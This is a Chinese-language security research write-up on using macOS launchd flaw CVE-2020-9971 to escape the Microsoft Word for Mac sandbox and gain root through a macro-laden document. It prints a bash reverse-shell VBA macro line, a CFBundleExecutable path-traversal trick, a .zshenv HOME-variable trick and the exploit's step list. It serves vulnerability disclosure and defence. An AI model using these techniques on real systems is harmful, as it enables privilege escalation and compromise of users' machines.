在本文中,研究人員展示了他們?nèi)绾卫靡寻l(fā)布的 macOS/iOS 權(quán)限提升漏洞將 Word 文檔武器化,解除應(yīng)用程序沙箱限制并獲得更高權(quán)限。
CVE-2020-9971 是 macOS/iOS 中的一個(gè)邏輯漏洞,可用于穩(wěn)定的提權(quán)漏洞。在這篇文章中,研究人員 (@R3dF09) 提到它也可以在最受限制的應(yīng)用沙箱中運(yùn)行,因此研究人員決定對(duì)其進(jìn)行測(cè)試并使用武器化的 Word 文檔繞過(guò) Microsoft Office 2019(適用于 Mac)應(yīng)用沙箱。為了完成這個(gè)任務(wù),研究人員不得不使用一些有趣的技巧來(lái)繞過(guò) Apple 的文件隔離。
CVE-2020-9971位于launchd進(jìn)程中,與XPC Services機(jī)制有關(guān)。這種機(jī)制提供了進(jìn)程間通信,允許開(kāi)發(fā)人員創(chuàng)建為其應(yīng)用程序執(zhí)行特定任務(wù)的服務(wù)。這通常用于將應(yīng)用程序拆分為更小的部分,從而提高可靠性和安全性。launchd是mac系統(tǒng)下通用的進(jìn)程管理器,是mac系統(tǒng)下非常重要的一個(gè)進(jìn)程,一般來(lái)說(shuō)該進(jìn)程不允許直接以命令行的形式調(diào)用。只能通過(guò)其控制管理界面,launchctl來(lái)進(jìn)行控制。launchd主要功能是進(jìn)程管理??梢岳斫獬墒且粋€(gè)常駐在后臺(tái)的進(jìn)程,根據(jù)用戶的配置,來(lái)響應(yīng)特定的系統(tǒng)事件。launchd既可以用于系統(tǒng)級(jí)別的服務(wù),又可以用于個(gè)人用戶級(jí)別的服務(wù)。
每個(gè)進(jìn)程都有自己的域,由 launchd 管理,其中包含有關(guān)進(jìn)程可用的 XPC 服務(wù)的信息。蘋果聲稱只有擁有者進(jìn)程才能修改自己的域,但該漏洞的核心漏洞是能夠?qū)⑷我?XPC 服務(wù)添加到任意進(jìn)程域中,然后觸發(fā)它在該進(jìn)程的上下文中運(yùn)行。起初,攻擊者將自制的 XPC 服務(wù)“注入”到具有 root 權(quán)限的特定進(jìn)程的域中(systemsoundserverd)。開(kāi)發(fā)者還使用了 XPC 服務(wù)的一個(gè)眾所周知的功能來(lái)監(jiān)聽(tīng)套接字以觸發(fā)和啟動(dòng)它。
接下來(lái),研究人員將描述成功將 Word 文檔武器化并繞過(guò) Word 應(yīng)用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當(dāng)時(shí)最新版本的 Microsoft Office 2019 上進(jìn)行的,但這無(wú)關(guān)緊要,因?yàn)樵撀┒丛诓僮飨到y(tǒng)端。
漏洞利用
研究人員的第一個(gè)目標(biāo)是創(chuàng)建一個(gè)獨(dú)立的命令行漏洞利用。在這個(gè)階段,研究人員認(rèn)為他們只需要?jiǎng)h除它并從武器化的 Word 文檔中執(zhí)行它即可,但實(shí)際情況并非如此。無(wú)論如何,研究人員用 XCode 創(chuàng)建了一個(gè)應(yīng)用程序,附帶一個(gè)簡(jiǎn)單的 XPC 服務(wù),它執(zhí)行以下步驟:
1.查找研究人員要使用的 root 特權(quán)進(jìn)程的 PID。正如研究人員已經(jīng)知道不可能在 Office 應(yīng)用沙箱中執(zhí)行 ps 一樣,研究人員改為使用 launchctl 打印系統(tǒng)的輸出,它顯示了系統(tǒng)中的進(jìn)程域。此時(shí)研究人員注意到systemoundserverd的進(jìn)程域是在啟動(dòng)后延遲相當(dāng)長(zhǎng)的時(shí)間創(chuàng)建的,所以研究人員改用launchservicesd的進(jìn)程域;
2.將研究人員的 XPC 服務(wù)注入到找到的 PID 的進(jìn)程域中;
3.通過(guò)打開(kāi) TCP 套接字觸發(fā)研究人員的 XPC 服務(wù)的啟動(dòng);
附帶的XPC服務(wù)只創(chuàng)建一個(gè)文件(表示成功),并配置為在指定的TCP端口上偵聽(tīng)。漏洞利用和 XPC 服務(wù)都存儲(chǔ)在同一個(gè)應(yīng)用程序包中,但請(qǐng)注意研究人員有兩個(gè)不同的可執(zhí)行文件。
通過(guò)這個(gè)獨(dú)立的漏洞利用,研究人員能夠從普通用戶那里獲得 root 權(quán)限,現(xiàn)在是時(shí)候開(kāi)始實(shí)現(xiàn)研究人員的最終目標(biāo)了——繞過(guò)沙盒。
繞過(guò)沙盒
研究人員的最終目標(biāo)是使用此漏洞將 Word 文檔武器化,以繞過(guò)應(yīng)用程序沙箱。其基礎(chǔ)是能夠從這個(gè)Word文檔中執(zhí)行shell命令,這可以通過(guò)Microsoft Office中的其他漏洞實(shí)現(xiàn),或者更容易通過(guò)VBA宏實(shí)現(xiàn),這讓研究人員只剩下說(shuō)服用戶按下“啟用宏”的工作。更多關(guān)于針對(duì) Mac 用戶的基于宏的攻擊請(qǐng)點(diǎn)此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看。對(duì)于這個(gè)概念驗(yàn)證,研究人員將使用 VBA 宏。
在 Office 應(yīng)用沙箱的上下文中獲取 bash shell 很簡(jiǎn)單,然后利用這些限制。研究人員所要做的就是偵聽(tīng)特定端口(例如 netcat)并從 Word 文檔中執(zhí)行以下 VBA 宏:
MacScript(“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”)
此時(shí),在沙箱中有了一個(gè)shell,研究人員試圖轉(zhuǎn)儲(chǔ)并執(zhí)行獨(dú)立漏洞,但它沒(méi)有奏效。經(jīng)過(guò)一些研究,研究人員發(fā)現(xiàn)他們?cè)谏诚渲袆?chuàng)建的每個(gè)文件都是使用“com.apple.quarantine”屬性創(chuàng)建的,這個(gè)可以通過(guò) xattr 實(shí)用程序觀察到。
隔離屬性是許多 macOS 保護(hù)的核心,最初,它僅附加到從互聯(lián)網(wǎng)下載的文件中,以執(zhí)行多項(xiàng)安全檢查(例如文件隔離、GateKeeper、Notarization 和 XProtect)。自從引入了沙箱之后,這個(gè)屬性又增加了一個(gè)角色——標(biāo)記從沙箱中創(chuàng)建的文件,并完全阻止它們被執(zhí)行。以下是研究人員試圖從沙箱shell中轉(zhuǎn)儲(chǔ)和執(zhí)行一個(gè)文件時(shí)產(chǎn)生的日志:
kernel: (Sandbox) Sandbox: bash(1724) deny(1) process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test
kernel: (Quarantine) exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086
可以看到研究人員可以執(zhí)行 shell 命令,但不能轉(zhuǎn)儲(chǔ)和運(yùn)行他們自己的可執(zhí)行文件。對(duì)于可利用的可執(zhí)行文件,研究人員有一個(gè)簡(jiǎn)單的替換方法:只需在ctypes包的幫助下運(yùn)行一個(gè)執(zhí)行相同步驟的python腳本。現(xiàn)在研究人員就能夠?qū)?XPC 服務(wù)注入目標(biāo)進(jìn)程域,甚至觸發(fā)它的執(zhí)行,但它沒(méi)有運(yùn)行:XPC 服務(wù)可執(zhí)行文件本身被標(biāo)記為隔離屬性。
現(xiàn)在是時(shí)候更深入地研究XPC服務(wù)的結(jié)構(gòu)了。從外部看,它看起來(lái)像一個(gè)擴(kuò)展名為“xpc”的單一文件,但它實(shí)際上是一個(gè)具有典型結(jié)構(gòu)的文件夾:
主要組件是 Info.plist 文件,它是一個(gè)描述服務(wù)的 XML 文件,以及可執(zhí)行文件本身(位于 MacOS 文件夾內(nèi))。Info.plist 中的部分內(nèi)容如下:
< key >CFBundleExecutable< /key >< string >AppService< /string >
研究人員不能使用他們自己的可執(zhí)行文件,所以唯一的選擇是使用系統(tǒng)現(xiàn)有的可執(zhí)行文件之一。研究人員嘗試在 CFBundleExecutable 項(xiàng)中使用完整路徑,但是 XPC 服務(wù)根本無(wú)法加載。很明顯,macOS 會(huì)在目錄 Contents/MacOS 中查找具有此項(xiàng)中指定名稱的可執(zhí)行文件,也許研究人員可以使用路徑遍歷來(lái)指向現(xiàn)有的可執(zhí)行文件,并嘗試將值更改為:
< key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >
令研究人員驚訝的是,它奏效了!當(dāng)研究人員使用這個(gè)“假”XPC 服務(wù)執(zhí)行漏洞利用時(shí),研究人員發(fā)現(xiàn)了一個(gè)具有 root 權(quán)限的“是”進(jìn)程,即使研究人員是從沙箱中執(zhí)行的。
因此,研究人員有能力以 root 權(quán)限運(yùn)行進(jìn)程,但似乎無(wú)法控制它們的參數(shù)。在團(tuán)隊(duì)內(nèi)部就這個(gè)問(wèn)題進(jìn)一步咨詢后,研究人員想出了一個(gè)好辦法,他們注意到可以控制新進(jìn)程的環(huán)境變量,即運(yùn)行一個(gè) shell 作為 XPC 服務(wù)(例如 zsh),將其 HOME 目錄更改為研究人員可以控制,并將 shell 在執(zhí)行開(kāi)始時(shí)提供的文件放在那里(例如。zshenv)。
將它們?nèi)糠庋b在一起
研究人員編寫了一個(gè) python 腳本,執(zhí)行以下步驟:
1.將“。zshenv”文件寫入當(dāng)前目錄,在沙箱內(nèi),路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data,其中包含研究人員希望以 root 身份執(zhí)行的載荷;
2.查找研究人員要使用的 root 權(quán)限進(jìn)程的 PID (launchservicesd);
3.創(chuàng)建“假”XPC 服務(wù),其中可執(zhí)行文件指向 zsh,并將 HOME 環(huán)境變量設(shè)置為當(dāng)前目錄;
4.將“假”XPC 服務(wù)注入到找到的 PID 的進(jìn)程域中;
5.通過(guò)打開(kāi) TCP 套接字觸發(fā) XPC 服務(wù)的啟動(dòng);
然后研究人員將該腳本封裝為 base64 格式,以便從VBA宏中執(zhí)行它,并將其插入到 AutoOpen 子例程中。具體演示過(guò)程請(qǐng)點(diǎn)此,其中有效載荷只在/tmp/hacked中創(chuàng)建一個(gè)文件(請(qǐng)注意,該文件是以 root 身份創(chuàng)建的,并且沒(méi)有隔離位)。
總結(jié)
研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞,以 Word 文檔作為研究人員的 POC。在這個(gè)過(guò)程中,研究人員發(fā)現(xiàn)了一種通過(guò) XPC 服務(wù)啟動(dòng)任意可執(zhí)行文件的方法(在 CFBundleExecutable 值中進(jìn)行路徑遍歷),特別是執(zhí)行 shell 腳本(通過(guò)控制 HOME 環(huán)境變量和轉(zhuǎn)儲(chǔ) .zshenv 文件的技巧)。
這個(gè)沙箱逃逸漏洞使研究人員能夠?yàn)?macOS 創(chuàng)建一個(gè)快速、簡(jiǎn)單和廉價(jià)的武器化 Word 文檔,這嚴(yán)重危害了系統(tǒng)安全。
安全建議
1.避免打開(kāi)陌生文檔,尤其是運(yùn)行來(lái)自未知來(lái)源或你不完全信任的發(fā)送方;
2.使用能夠處理此類攻擊的綜合性安全產(chǎn)品。